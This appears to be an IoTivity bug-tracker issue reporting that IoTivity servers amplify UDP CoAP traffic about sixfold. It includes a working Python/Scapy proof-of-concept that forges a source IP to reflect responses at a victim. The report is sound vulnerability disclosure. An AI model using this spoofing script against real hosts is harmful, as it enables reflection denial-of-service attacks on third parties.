Uploaded image for project: 'IoTivity'
  1. IoTivity
  2. IOT-3267

Traffic amplification of UDP packets


    • Found in Version/s:
      Current (HEAD-5349dad)
    • Issue Severity:
    • Reproducibility:
      Always (100%)
    • Bugzilla ID:


      IoTivity server in current version (HEAD-5349dad taken from github) can be used to perform Distributed Denial of Service attacks acting as network amplifier with spoofing of the source IP address.

      After receiving CoAP GET message (53 bytes long) IoTivity server responds with 6 CoAP packets (each 62 bytes long)

      ###[ CoAP ]###
      ver = 1L
      type = CON
      tkl = 0L
      code = 4.01 Unauthorized
      msg_id = 1881
      token = ''
      options = [('Uri-Path', 'test')]
      paymark = ''

      Together all response packets are 372 bytes, which gives 600% amplification factor (calculated as: size_of_output/size_of_input - 1).
      Server responds to IP address from first packet without getting any concurrent response from client, so this request can be used for Distributed Denial of Service with spoofing source IP address.

      Issue was tested and was reproduced for following examples IoTivity server applications:

      • devicediscoveryserver
      • fridgeserver
      • garageserver
      • groupserver
      • lightserver
      • presenceserver
      • roomserver
      • simpleclientserver
      • simpleserver
      • simpleserverHQ

      Issue can be reproduced using following Python2 script (requires Scapy library and sudo to spoof source IP address):


      import sys
      from scapy.all import *

      IOTIVITY_PAYLOAD = "40010759b474657374"
      data = IOTIVITY_PAYLOAD.decode('hex')
      packet = IP(src=sys.argv[1], dst=sys.argv[3])/UDP(sport=int(sys.argv[2]), dport=5683)/Raw(data)
      sr(packet, timeout=5, multi=1)


      Execution of the script:

      sudo python iotivity_test.py src_ip src_port dst_ip
      (where: src_ip and src_port are IP and port of spoofed source client
      dst_ip is IP of tested IoTivity server on port 5683)
      sudo python iotivity_test.py 50000

      For IoTivity example application started with following command on server with IP=

      CoAP responses will be sent to



        No reviews matched the request. Check your Options in the drop-down menu of this sections header.



            • Assignee:
              avolkov Aleksey Volkov
              CVEReporting CVE Reporting
            • Votes:
              0 Vote for this issue
              3 Start watching this issue


              • Created: